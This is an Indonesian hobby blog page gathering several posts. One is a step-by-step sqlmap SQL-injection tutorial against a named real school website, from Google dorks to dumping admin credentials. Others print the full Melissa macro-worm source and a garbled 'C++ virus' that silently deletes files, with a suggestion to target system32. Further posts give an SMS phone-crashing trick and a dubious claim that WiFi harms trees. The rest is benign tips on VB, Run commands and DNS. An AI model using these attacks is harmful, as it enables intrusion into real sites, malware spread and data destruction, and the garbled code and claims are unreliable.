Jumat, 30 Agustus 2013

Cara Deface dengan Sqlmap di backtrack

kali ini saya akan menulis tentang Cara Deface Dengan SQL Injection yang dikenal dengan teknik SQLmap di BackTrack. Tools ini sudah ada di dalam File .ISO pada BackTrack.
Disini, saya menggunakan BackTrack 5 R3.
Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
Dan masih banyak lagi dork bertebaran di Google :D

Dalam Tutorial kali ini, saya akan menggunakan target salah satu Sekolah yang ada di Sidoarjo.
http://www.sman2sidoarjo.sch.id/

Untuk mengetahui Website tersebut Vuln atau tidak, silahkan tambahkan tanda ‘ (petik satu) setelah atau sebelum nomor id tersebut, bisa juga dengan menambahkan tanda  - (minus) sebelum nomor id tersebut.
Contoh :                http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5''
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=’5
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=-5

Jika target tersebut Vuln terhadap SQLi, maka akan muncul kira-kira seperti ini :

Jika sudah mendapatkan target, silahkan buka Terminal, kemudian ketikan perintah “cd /pentest/database/sqlmap” (tanpa tanda petik) kemudian Enter.
Kemudian akan muncul seperti ini.

Kemudian untuk mencari nama database, ketikkan “ ./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 --dbs” (tanpa tanda petik) kemudian Enter.




Kemudian akan muncul seperti ini :


Disana kita dapat menemukan 2 Database, yaitu information_schema dan sman2sidoarjo_sman2sda
Setelah kita mendapatkan Database tersebut, kita tulis “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase --tables” (tanpa tanda petik) kemudian Enter.


Setelah itu akan muncul beberapa Tabel.


Kemudian kita mencari Colums dengan cara mengetik “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --columns” (tanpa tanda petik) kemudian Enter.


Disini kita akan menjumpai beberapa Columns dari Tabel Admin.


Kemudian, untuk mengetahui isi dari Columns tersebut, kita ketikkan “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --dump” (tanpa tanda petik) kemudian Enter.


Nah, kita sekarang sudah menemukan User + Pass Administrator dari Website tersebut :)


Jika sudah mendapatkan User + Pass, pasti Anda tau kan yang harus dilakukan ? :)
Nah, tinggal cari Login Adminnya deh :D
Caranya banyak kok di Google :)

0 komentar:

Mematikan Handphone melalui SMS


Seperti judul diatas hari ini saya akan berbagi trik untuk mematikan HandPhone melalui SMS.

Pernahkah kalian menerima SMS yang begitu di buka maka handphone akan mati dengan sendirinya jika tombol di tekan ke bawah ?

Mengapa bisa mati?
"Karena handphone tidak dapat membaca file yang begitu berat" (itu menurut saya).

Tapi trik/cara mematikan handphone lewat SMS ini tidak berlaku untuk tipe ponsel yang memiliki GPRS, jadi buat HandPhone yang sudah 3G ati-ati ya :D
Bersyukurlah jika HandPhone kamu memiliki jaringan GPRS, karena trik tersebut tidak akan berhasil. Cara mematikan HandpPhone lewat SMS ini sudah saya tes di ponsel-ponsel produk N*kia yang tidak memiliki GPRS.

Baiklah sekarang saya akan berbagi trik rahasia mematikan HandPhone lewat SMS:
Untuk menjalankan trik ini kita tidak perlu memakai aplikasi apapun. Kita cuma mengetik kode format HandPhone. Silahkan copy kode format handphone berikut.


 ̲̲̲̲̅̅̅̅ ̲̲̲̲̲̲̲̲̲̅̅̅̅̅̅̅̅̅ ̲̲̲̲̲̲̲̲̲̅̅̅̅̅̅̅̅̅ ̲̲̲̲̲̲̲̲̲̅̅̅̅̅̅̅̅̅0


Setelah kodenya di copy silahkan kirim SMS ke nomor target dengan isi teks code yang sudah di copy


Warning:
* Jangan di gunakan untuk kejahatan. Trik ini saya share untuk menambah pengetahuan pembaca.
* Jangan kirimkan sms ini ke orang yang gaptek, karena ini bisa berakibat fatal.

SEMOGA BERHASIL

0 komentar:

Belajar Operator Pada VB[Aritmatika,Logika,Perbandingan]

Kali ini akan kita akan mengenal Operator tes, langsung saja ya..

1. Operator Aritmatika Dalam menggunakan fungsi yang berhubungan dengan operasi aritmatika ada beberapa operator yang harus anda kenal terlebih dahulu. Operator aritmatika terdiri dari Penjumlahan (+), pengurangan (-), perkalian (*), pembagian bilangan real(/), pembagian bilangan bulat (\), perpangkatan (^),penggabungan (&) dan sisa hasil bagi (mod) -Penjumlahan, Hasil = Angka1 + Angka2 -Pengurangan, Hasil = Angka1 - Angka2 -Perkalian, Hasl = Angka1 * Angka2 -Pembagian Bilangan Real (/), Hasil = Angka1 / Angka2 -Pembagian Bilangan Bulat (\), Hasil= Angka1 \ Angka

2. Operator Modulus, digunakan untuk melakukan operasi pembagian dari dua bilangan yang akan mengahasilkan nilai sisa hasil pembagian. Hasil = angka1 Mod Angka2, Contoh Hasil = 10 Mod 5 akan menghasilkan nilai 0 -Operator perpangkatan, Hasil Angka1 ^ Eksponen, contoh Hasil = 2 ^ 2 maka akan menghasilkan nilai 4 -Operator penggabungan, digunakan untuk menggabungkan dua pernyataan yang berbentuk teks (string), jika pernyatan yang digabungkan bukan merupakan data berbentuk teks (string) maka data tersebut akan diubah menjadi data bertipe string. Jika pernyataan bernilai Null, maka hasil juga akan bernilai Null. Jika salah satu pernyataan bernilai Null, maka peryataan tersebut dianggap sebagai teks kosong ("").2. Operator Logika/Boolean Operator logika merupakan operator yang menghasilkan nilai logika (True atau False). Operator logika ini sering disebut dengan operator Boolean, operator ini meliputi : And, Aqv, Imp, Not, Or dan Xor.

3. Operator Perbandingan Operator perbandingan berfungsi untuk membandingkan dua pernyataan, meliputi : Lebih besar (>), lebih kecil (<), samadengan (=), lebih besar samadengan (>=), lebih kecil samadengan (<=), tidak samadengan (<>)

Demikian sekilas pengenalan mengenai operator yang ada pada visual basic, dalam pembelajaran ini mungkin banyak kekurangan mohon maafnya dan semoga bermanfaat, terimakasih.

0 komentar:

119 Perintah "RUN"



Banyak sahabat netter serta programming yang hobi utak-atik windowsnya, entah untuk lebih effisien atau terbiasa pasti sering menggunakan “Run”, karena dengan menggunakan fasilitas run yang secara default ada di dalam windows memanggil program atau aplikasi tertentu atau mungkin rahasia dapat dilakukan tanpa harus membuka explorer maupun “tab-tab” terlebih dahulu sehingga kita dapat melakukan aktivitas dengan lebih singkat dan efisien.

Namun jika kita ingin menggunakan run kita harus mengetahui perintah-perintah yang digunakan didalamnya atau yang sering disebut dengan nama run commands. Oleh karena itulah Gudang Kreativitas akan berikan 101 run commands yang dapat teman-teman coba dan lakukan untuk apa saja, mulai dari hal biasa sampai hal-hal luarbiasa.

Selamat Mencoba :

A.
1. Accessibility Controls ==>Perintah==>access.cpl
2. Add Hardware Wizard ==>Perintah==> hdwwiz.cpl
3. Add/Remove Programs =>Perintah==> appwiz.cpl
4. Administrative Tools =>Perintah=> control admintools
5. Automatic Updates==>Perintah==>wuaucpl.cpl

B.
6. Bluetooth Transfer Wizard==>Perintah==>fsquirt
7. Calculator==>Perintah==>calc

C .
8. Certificate Manager==>Perintah==>certmgr.msc
9. Character Map==>Perintah==>charmap
10. Check Disk Utility==>Perintah==>chkdsk
11. Clipboard Viewer==>Perintah==>clipbrd
12. Command Prompt==>Perintah==>cmd
13. Component Services==>Perintah==>dcomcnfg
14. Computer Management==>Perintah==>compmgmt.msc

D.
15. Date/Time Properties==>Perintah==>timedate.cpl
16. DDE Share==>Perintah==>ddeshare
17. Device Manager==>Perintah==>devmgmt.msc
18. Direct X Control Panel (If Installed)*==>Perintah==>directx.cpl
19. Direct X Troubleshooter==>Perintah==>dxdiag
20. Disk Cleanup Utility==>Perintah==>cleanmgr
21. Disk Defragment==>Perintah==>dfrg.msc
22. Disk Management==>Perintah==>diskmgmt.msc
23. Disk Partition Manager==>Perintah==>diskpart
24. Display Properties==>Perintah==>control desktop
25. Display Properties==>Perintah==>desk.cpl
26. Display Properties (w/Appearance Tab Preselected)==>Perintah==>control color
27. Dr. Watson System Troubleshooting Utility==>Perintah==>drwtsn32
28. Driver Verifier Utility==>Perintah==>verifier

E .
29. Event Viewer==>Perintah==>eventvwr.msc

F.
30. File Signature Verification Tool==>Perintah==>sigverif
31. Findfast==>Perintah==>findfast.cpl
32. Folders Properties==>Perintah==>control folders
33. Fonts==>Perintah==>control fonts
34. Fonts Folder==>Perintah==>fonts
35. Free Cell Card Game==>Perintah==>freecell

G.
36. Game Controllers==>Perintah==>joy.cpl
37. Group Policy Editor (XP Prof)==>Perintah==>gpedit.msc

H.
38. Hearts Card Game==>Perintah==>mshearts

I.
39. Iexpress Wizard==>Perintah==>iexpress
40. Indexing Service==>Perintah==>ciadv.msc
41. Internet Explorer==>Perintah==>iexplore
42. Internet Properties==>Perintah==>inetcpl.cpl
43. IP Configuration (Menampilkan konfigurask koneksi)==>Perintah==>ipconfig /all
44. IP Configuration (Menampilkan konentens DNS Cache)==>Perintah==>ipconfig /displaydns
45. IP Configuration (Mendelete DNS konten Cache)==>Perintah==>ipconfig /flushdns
46. IP Configuration (Pelepasan Semua Koneksi)==>Perintah==>ipconfig /release
47. IP Configuration (Memperbaharui Semua Koneksi)==>Perintah==>ipconfig /renew
48. IP Configuration (Refreshes DHCP & Re-Registers DNS)==>Perintah==>ipconfig /registerdns
49. IP Configuration (Menampilkan DHCP Class ID)==>Perintah==>ipconfig /showclassid
50. IP Configuration (Memodifikasi DHCP Class ID)==>Perintah==>ipconfig /setclassid

J.
51. Java Control Panel (Jika diinstall)==>Perintah==>jpicpl32.cpl
52. Java Control Panel (Jika diinstall)==>Perintah==>javaws

K.
53. Keyboard Properties==>Perintah==>control keyboard

L.
54. Local Security Settings==>Perintah==>secpol.msc
55. Local Users and Groups==>Perintah==>lusrmgr.msc
56. Logs You Out Of Windows==>Perintah==>logoff

M.
57. Microsoft Chat==>Perintah==>winchat
58. Minesweeper Game==>Perintah==>winmine
59. Mouse Properties==>Perintah==>control mouse
60. Mouse Properties==>Perintah==>main.cpl
61. Mozilla Firefox==>Perintah==>firefox
62. MS Word==>Perintah==>winword
63. MS Excel==>Perintah==>excel
64. MS Outlook==>Perintah==>outlook
65. MS Power Point==>Perintah==>powerpnt

N.
66. Network Connections==>Perintah==>control netconnections
67. Network Connections==>Perintah==>ncpa.cpl
68. Network Setup Wizard==>Perintah==>netsetup.cpl
69. Notepad==>Perintah==>notepad
70. Nview Desktop Manager (If Installed)==>Perintah==>nvtuicpl.cpl

O.
71. Object Packager==>Perintah==>packager
72. ODBC Data Source Administrator==>Perintah==>odbccp32.cpl
73. On Screen Keyboard==>Perintah==>osk
74. Opens AC3 Filter (If Installed)==>Perintah==>ac3filter.cpl

P.
75. Paint==>Perintah==>mspaint
76. Password Properties==>Perintah==>password.cpl
77. Performance Monitor==>Perintah==>perfmon
78. Phone and Modem Options==>Perintah==>telephon.cpl
79. Power Configuration==>Perintah==>powercfg.cpl
80. Printers and Faxes==>Perintah==>control printers
81. Printers Folder==>Perintah==>printers
82. Private Character Editor==>Perintah==>eudcedit

Q.
83. Quicktime (If Installed)==>Perintah==>QuickTime.cpl

R.
84. Regional Settings==>Perintah==>intl.cpl
85. Registry Editor==>Perintah==>regedit
86. Registry Editor==>Perintah==>regedit32
87. Remote Desktop==>Perintah==>mstsc
88. Removable Storage==>Perintah==>ntmsmgr.msc
89. Removable Storage Operator Requests==>Perintah==>ntmsoprq.msc
90. Resultant Set of Policy (XP Prof)==>Perintah==>rsop.msc

S.
91. Scanners and Cameras==>Perintah==>sticpl.cpl
92. Scheduled Tasks==>Perintah==>control schedtasks
93. Security Center==>Perintah==>wscui.cpl
94. Services==>Perintah==>services.msc
95. Shared Folders==>Perintah==>fsmgmt.msc
96. Shuts Down Windows==>Perintah==>shutdown
97. Sounds and Audio==>Perintah==>mmsys.cpl
98. Spider Solitare Card Game==>Perintah==>spider
99. SQL Client Configuration==>Perintah==>cliconfg
100. System Configuration Editor==>Perintah==>sysedit
101. System Configuration Utility==>Perintah==>msconfig
102. System File Checker Utility (Segera scan)=>Perintah=>sfc /scannow
103. System File Checker Utility (Pindai Sekali Pada Boot Berikutnya) =>Perintah=>sfc /scanonce
104. System File Checker Utility (Scan seluruh Boot)=>Perintah=>sfc /scanboot
105. System File Checker Utility (Kembali ke setting Default)=>Perintah=>sfc /revert
106. System File Checker Utility (Purge File Cache)==>Perintah==>sfc /purgecache
107. System File Checker Utility (Set Cache Size untuk ukuran x)==>Perintah==>sfc /cachesize=x
108. System Properties==>Perintah==>sysdm.cpl

T.
109. Task Manager==>Perintah==>taskmgr
110. Telnet Client==>Perintah==>telnet

U.
111. User Account Management==>Perintah==>nusrmgr.cpl
112. Utility Manager==>Perintah==>utilman

W.
113. Windows Firewall==>Perintah==>firewall.cpl
114. Windows Magnifier==>Perintah==>magnify
115. Windows Management Infrastructure==>Perintah==>wmimgmt.msc
116. Windows System Security Tool==>Perintah==>syskey
117. Windows Update Launches==>Perintah==>wupdmgr
118. Windows XP Tour Wizard==>Perintah==>tourstart
119. Wordpad==>Perintah==>write

Saya rasa udah cukup sampai disini saja ya:D

Selamat Mencoba.. “Run Commands” utak – atik deh windows Nya.. Tapi hati-hati ya karena kalo ntar ada kesalahan dalam exsperimen anda saya gak ikut-ikut’an lho..:D

0 komentar:

kode kode rahasia di handphone Android



PERHATIAN: Informasi ini ditujukan untuk pengguna yang telah berpengalaman. Hal ini tidak dimaksudkan untuk pengguna yang awam atau untuk kejahatan. Tolong jangan mencoba salah satu metode berikut jika Anda tidak terbiasa dengan ponsel. Saya tidak akan bertanggung jawab atas penggunaan atau penyalahgunaan informasi ini, termasuk kehilangan data atau kerusakan hardware. Jadi risiko Anda tanggung sendiri.


*#*#4636#*#*
Kode ini dapat digunakan untuk mendapatkan informasi menarik tentang telepon dan baterai, diantaranya: Informasi Ponsel Informasi Battery Battery history Statistik Pemakaian

*#*#7780#*#*
Kode ini dapat digunakan untuk mereset data, diantaranya:
-Pengaturan akun Google yang tersimpan pada ponsel Pengaturan sistem data aplikasi Aplikasi yang di download data yang tidak akan terhapus
-Sistem Operasi serta paket aplikasi bawaan Android Semua data yang ada pada memory card

*2767*3855#
Kode ini digunakan untuk memformat seluruh system termasuk penyimpanan memori internal. Hal ini juga akan menginstal ulang firmware telepon.

*#*#34971539#*#*
Kode ini digunakan untuk mendapatkan informasi tentang kamera ponsel, diantaranya:
Update camera firmware pada gambar (jangan anda coba, karena dapat merusak komponen kamera) Update camera firmware pada SD card Mendapatkan versi camera firmware Mendapatkan total update firmware.

*#*#7594#*#*
Kode ini dapat digunakan untuk mengubah tombol “End Call atau Power”, jadi jika Anda menekannya lama, maka akan tampil pada layar meminta Anda untuk memilih pilihan dari mode Diam, Airplane mode dan Power off.

*#*#273283*255*663282*#*#*
Kode ini akan membuka layar Berkas salinan untuk membuat file cadangan pada media Anda misalnya Gambar, suara, catatan, video dan suara.

*#*#197328640#*#*
Kode ini dapat digunakan untuk masuk ke modus Service. Dapat menjalankan berbagai tes dan mengubah pengaturan di service mode.

Kode untuk mengetes WLAN, GPS dan Bluetooth
*#*#232339#*#* atau *#*#526#*#* OR *#*#528#*#*

Mengetes WLAN (Gunakan tombol “Menu” untuk memulai berbagai tes) *#*#232338#*#*

Menampilkan WiFi MAC address *#*#1472365#*#*

Mengetes GPS *#*#1575#*#*

Mengetes GPS lainnya *#*#232331#*#*

Mengetes Bluetooth *#*#232337#*#

Menampilkan Bluetooth device
Kode untuk mengetahui informasi versi Firmware

*#*#4986*2650468#*#*

Mengetahui PDA, Phone, H/W, RFCallDate *#*#1234#*#*

Mengetahui PDA dan Ponsel *#*#1111#*#*

Mengetahui versi FTA SW *#*#2222#*#*

Mengetahui versi FTA HW *#*#44336#*#*

Mengetahui PDA, Phone, CSC, Build Time, Changelist number
Kode untuk menampilkan berbagai tes

*#*#0283#*#*

Packet Loopback *#*#0*#*#*

Mengetes LCD *#*#0673#*#* atau *#*#0289#*#*

Mengetes Melody atau Nada *#*#0842#*#*

Mengetes Device (Vibration dan BackLight) *#*#2663#*#*

Mengetahui versi Touch screen *#*#2664#*#*

Mengetes Touch screen *#*#0588#*#*

Mengetes Proximity sensor *#*#3264#*#*


CATATAN: Semua kode di atas telah dicoba pada semua ponsel Android.

0 komentar:

Bahaya dan Efek samping dari WiFi

Penelitian terhadap dampak radiasi sinyal nirkabel pada manusia umumnya tidak
menghasilkan kesimpulan yang kongkrit. Akan tetapi, dari penelitian
terbaru yang dilakukan terhadap pohon, terungkap bahwa makhluk hidup
yang satu ini lebih ringkih dibanding manusia. Penelitian yang
dilakukan oleh Wageningen University menemukan bahwa pepohonan yang
tumbuh di kawasan yang memiliki aktivitas WiFi tinggi, khususnya di
kawasan pemukiman penduduk, menderita gejala yang tidak sama dengan
gejala yang disebabkan oleh bakteri atau virus.

Seperti dikutip dari PopSci, 23 November 2010, gejala-gejala yang
muncul pada pohon termasuk di antaranya adalah pendarahan, celah di
kulit, matinya bagian tertentu dari daun, serta pertumbuhan yang
abnormal. Untuk mengujicoba hipotesa apakah penyebab penyakit misterius
tersebut diakibatkan oleh radiasi WiFi, peneliti menggunakan 20 pohon
ash atau Fraxinus dan memberikan berbagai tingkat radiasi pada
pohon-pohon tersebut selama 3 bulan.

Ternyata, pohon yang terekspos sinyal WiFi menunjukkan tanda-tanda
penyakit akibat radiasi, termasuk warna seperti timah pada
daun-daunnya, yang mengindikasikan bahwa daun tersebut akan segera
mati. Sebagai gambaran, di negara seperti Belanda, sekitar 70 persen
pepohonan di kawasan pemukiman mengalami efek samping dari radiasi.
Angkanya naik dari hanya 10 persen pada 5 tahun lalu. Ini merupakan hal
yang lumrah mengingat penggunaan WiFi telah meroket pada beberapa tahun
terakhir.

Saat ini, para ilmuwan akan melakukan sejumlah penelitian lain untuk
mengetahui lebih lanjut seputar radiasi pada pertumbuhan tanaman. Dan
sayangnya, belum ada solusi yang dapat diberikan bagi pepohonan akibat
dampak buruk penggunaan WiFi tersebut.

0 komentar:

Source code virus melissa

Dulu virus yang satu ini sempat menggemparkan bagi pengguna PC dan internet. dan
pada bulan Maret 1999, virus Melissa begitu kuatnya sehingga memaksa Microsoft dan sejumlah perusahaan raksasa lainnya untuk benar-benar mematikan koneksi e-mail mereka sampai virus dapat diatasi.
dan virus melissa sempat masuk daftar 10 virus paling berbahaya…

silakan baca-baca disini http://www.scribd.com/doc/62467890/10-Virus-Paling-Berbahaya

Kebetulan source code virus melissa sdh lama nangkring di hardisk saya, jadi sebagai referensi atau pembelajaran bagi yg ingin tau lebih dalam lagi virus melissa ane bagiin source codenya.

// Melissa Virus Source Code
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString(“”,
“HKEY_CURRENT_USER\Software\Mic*ft\Office\9.0\Word\Security”, “Level”) <> “”
Then
CommandBars(“Macro”).Controls(“Security…”).Enabled = False
System.PrivateProfileString(“”,
“HKEY_CURRENT_USER\Software\Mic*ft\Office\9.0\Word\Security”, “Level”) = 1&
Else
CommandBars(“Tools”).Controls(“Macro”).Enabled = False
Options.ConfirmConversions = (1 – 1): Options.VirusProtection = (1 – 1):
Options.SaveNormalPrompt = (1 – 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject(“Outlook.Application”)
Set DasMapiName = UngaDasOutlook.GetNameSpace(“MAPI”)
If System.PrivateProfileString(“”,
“HKEY_CURRENT_USER\Software\Mic*ft\Office\”, “Melissa?”) <> “… by David L. Smith”
Then
If UngaDasOutlook = “Outlook” Then
DasMapiName.Logon “profile”, “password”
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = “Important Message From ” &
Application.UserName
BreakUmOffASlice.Body = “Here is that document you asked for … don’t
show anyone else;-)”
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = “”
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Mic*ft\Office\”,
“Melissa?”) = “… by Kwyjibo”
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> “Melissa” Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = “Melissa”
DoAD = True
End If
If NTI1.Name <> “Melissa” Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = “Melissa”
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = “”
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString (“Private Sub Document_Close()”)
Do While ADI1.CodeModule.Lines(BGN, 1) <> “”
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = “”
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString (“Private Sub Document_Open()”)
Do While NTI1.CodeModule.Lines(BGN, 1) <> “”
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, “Document”) =
False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, “Document”) <> False) Then
ActiveDocument.Saved = True: End If
‘WORD/Melissa written by Kwyjibo
‘Works in both Word 2000 and Word 97
‘Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
‘Word -> Email | Word 97 <–> Word 2000 … it’s a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText ” Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters.  Game’s over.
I’m outta here.”
End Sub

0 komentar:

Source code virus sederhana dari C++




Sebuah coding sederhana yang fungsinya menghapus semua file tanpa diketahui..
Script ini hanya menghapus file.txt yang kosong saja di drive C: ..
Ciri khas aplikasi ini membuat suara seperti “Beep” pada bios kompi tersebut…  cekidot gan ^^
Selanjutnya copy scrip ini pada complier

# Include <iostream.h>
#include <widows.h>
#include <winable>
#include <stdio.h>
using namespace std;
int main;
{
FreeConsle ();// membuat program yang dijalankan tanpa konsol sehingga pengguna tidak tahu apa yang akan terjadi, ini adalah opsional.
Beep (800.300); / / UNTUK bunyi Beep (ffrequency, durasi 1000 = 1 detik)
Sleep(3000); Sleep (3000);
Beep(800,300); Beep (800.300);
Beep(2400,300); Beep (2400,300);
Beep(800,300); Beep (800.300);
Beep(2400,300); Beep (2400,300);
Beep(800,300); Beep (800.300);
Beep(2400,300); Beep (2400,300);
Beep(800,300); Beep (800.300);
Beep(2400,300); Beep (2400,300);
menghapus ("C: \ \ file.txt" / * ya \ \ tidak \ setelah C :*/);
return 0; return 0;

}

setelah di pake akan terdengar serangkaian bunyi beep (bukan dari speeker tp dari BIOS) dan akan menghapus file txt.
kita jg dapat mengedit agar dapat digunakan untuk menghapus sistem32 di kompie, 

menghapus   (C: \ \ misalnya);



Segala yg ada di direktori C: akan ke delete ^^

Jadikan ini sebagai bahan pembelajaran,jangan di gunakan untuk kejahatan atau jailin kompie temen/warnet,tapi kalo kepepet ya gpp sih….  :D

BYTE-007

0 komentar:

Arti Pesan Error pada Website 404,401,509 dll



Bagi para webmaster atau para pelaku teknologi informasi dan komunikasi kode error seperti 401, 403, 404, 406, 500, 509 bukan hal yang baru.

 Karena mereka sering mengalami hal-hal seperti ini dan mereka pun tahu jika hal itu terjadi. Namun bagi yang tidak tahu akan hal ini maka perlu tahu atau mengenal arti dari pesan error tersebut. Di bawah ini di jelaskan arti error tersebut bersama solusinya.


Error 401 : Unauthorized
Status ini menyatakan bahwa pengunjung website tidak memiliki hak akses untuk folder yang diproteksi oleh password.

Solusinya : Apabila Anda merasa ada kesalahan pada pengaturan proteksi folder, coba dicek kembali melalui menu Password Protect Directories di CPanel (control Panel) website anda.

Error 403 : Forbidden
Pada status 403, pengunjung sama sekali tidak dapat mengakses ke folder tujuan. Status 403 muncul disebabkan oleh kesalahan pengaturan hak akses pada folder.

Solusinya : Cek kembali hak akses dari folder tujuan. Tolong diingat juga, hak akses yang normal untuk folder adalah 755 (rwxr-xr-x).

Error 404 : Not Found

Status 404 menyatakan bahwa file atau halaman yang diminta tidak ditemukan dalam database suatu website. Mudahnya, link yang Anda cari tidak ada.

Solusinya :Pastikan file atau folder halaman sudah dan sukses di-upload ke account hosting, dan pastikan juga nama file atau link halaman tersebut sudah sesuai dengan nama file atau halamannya yang akan diakses (terutama pada penggunaan huruf besar dan kecil - case sensitive.

Error 406 : Not Acceptable

Status 406 menyatakan bahwa permintaan dari browser tidak dapat dipenuhi oleh server.

Solusinya : Segeralah hubungi pihak provider hosting anda untuk dimintai pertolongan menyelesaikan permasalahan ini jika anda belum bisa mengatasinya.


Error 500 : Internal Server Error

Status 500 menyatakan bahwa ada kesalahan konfigurasi pada account hosting.

Solusinya : Cek kembali file .htaccess pada account hosting Anda dan pastikan setiap barisnya sudah tertulis dengan benar sesuai dengan standard code-nya.

Error 509 : Bandwidth Limit Exceeded

Saya yakin, pastinya sudah banyak yang tahu problem code error ini. Menyatakan bahwa penggunaan bandwidth pada account hosting sudah melebihi batas atau biasa dikenal dengan sebutan OVER quota.

Solusinya : beli bandwidth tambahan atau upgrade paket hosting Anda. 

Sekian :)

BYTE-007

0 komentar:

Senin, 26 Agustus 2013

Tempat Tukar link

Tukar Link adalah suatu hal yang sering dilakukan Blogger untuk saling menukar Link Blogg mereka, agar dapat tampil di halaman Blogg lain. Hal ini seolah tidak dapat dipisahkan dengan Blogger, karena Tukar link mengandung banyak kelebihan, Diantaranya:


  • Link Blogg kita bisa tampil Eksis di Blogg orang lain
  • Bisa mendapat pengunjung dari blogg teman 
  • Alexa Rank bisa meningkat
  • Berpeluang besar mendapat page rank
  • Google Semakin Friendly dengan Blogg kita
Semakin banyak Kita menukar link, maka semakin baik untuk Blogg kita. Google dan Alexa sangat senang dengan suatu situs yang Link nya tersebar dimana-mana.
Anda sudah siap Bertukar Link ?

Tinggalkan komentar dibawah jika ingin bertukar link. Jika anda sudah meletakan link Blogg ini (Dan For Blogg), tinggalkan komentar Link Blogg anda, maka saya akan memasang link anda.

  1. Dan For Blogg hanya menerima 35 slot Tukar link saja. (anda bisa lihat di kolom "My Friends Link)
  2. Memilki Alexa Rank 2 Juta Kebawah,
  3. Anda harus Update artikel minimal 1 Bulan sekali
  4. Link akan saya pantau terus, jika anda mencabut Link Dan For Blogg, maka saya akan mencabut kembali Iink blogg tersebut

URL Dan For Blogg  :

<a href="http://danforblogg.blogspot.com/" target="_blank">Dan For Blogg</a></div>

0 komentar:

[Tutorial] Setting Domain .TK ke BlogSpot



Dear All

Hoam, ngantuk nih saya :D gegara begadang 2 hari 2 malem
Biasanya sih ga ngantuk yah, mungkin ini lagi tumben saya ngantuk"an :D
Eh kok malah jadi curcol ini :3

Oh yah kmaren kan sdh pernah di update post yg kek gini
Cara Setting Domain .TK ke BlogSpot
Tapi katanya ga work :D
Nah kali ini.. ga mungkin ga work hehe
Oke kita simak saja langsung

Caranya :

1. Seperti biasa, login dulu ke akun .TK masing". kalo belum punya, daftar disini
2. Masuk ke Domain Panel lalu edit custom DNS nya. lihat gambar dibawah

NameServer :
ns1.afraid.org
ns2.afraid.org
ns3.afraid.org
ns4.afraid.org
3.  Masuk ke sini lalu login stelah itu pilih menu domains dan di dalamnya akan ada tulisan "add a domain" sperti dibawah ini. *jika tidak punya akunnya harap regist dulu 
4. Setelah di Add domain nya, akan muncul tampilan sperti ini. isikan seperti berikut :

5. Setelah di submit, kita lanjut dgn mengeklik "manage". previewnya akan seperti ini :
6. Disini, kita akan menghapus beberapa bagian dari domain yg kita submit tadi. krna untuk di setting ke blog, bagian ini tidak akan kita gunakan. jadi, lebih baik kita delete saja :)
*Yang ditandai berarti harus di hapus.

7. Setelah dihapus, kan tinggal 2 tuh. nah kamu pilih yg tidak ada WWW nya lalu klik hingga muncul  seperti ini :
Buat juga yg lainnya seperti diatas dgn menambahkan masing" Google IP Address ini.
1.IP = 216.239.32.21
2.IP = 216.239.34.21
3.IP = 216.239.36.21
4.IP = 216.239.38.21

8. Ketika semuanya sudah jadi maka hasilnya akan seperti ini :


9. Dan sekarang, kita beralih ke Blogger.com dulu, untuk mengambil Cname dr blog tersebut
ikuti beberapa langkah ini (khusus yg tidak tau)
buka blogger.com > Dashboard > Setelan , maka ketemulah yg bginian :D

10. Kita kembali lagi ke FreeDNS. Tambahkan 2 cname di atas sperti di bawah ini :

Jika semuanya sudah selesai, maka tampilan akan seperti ini
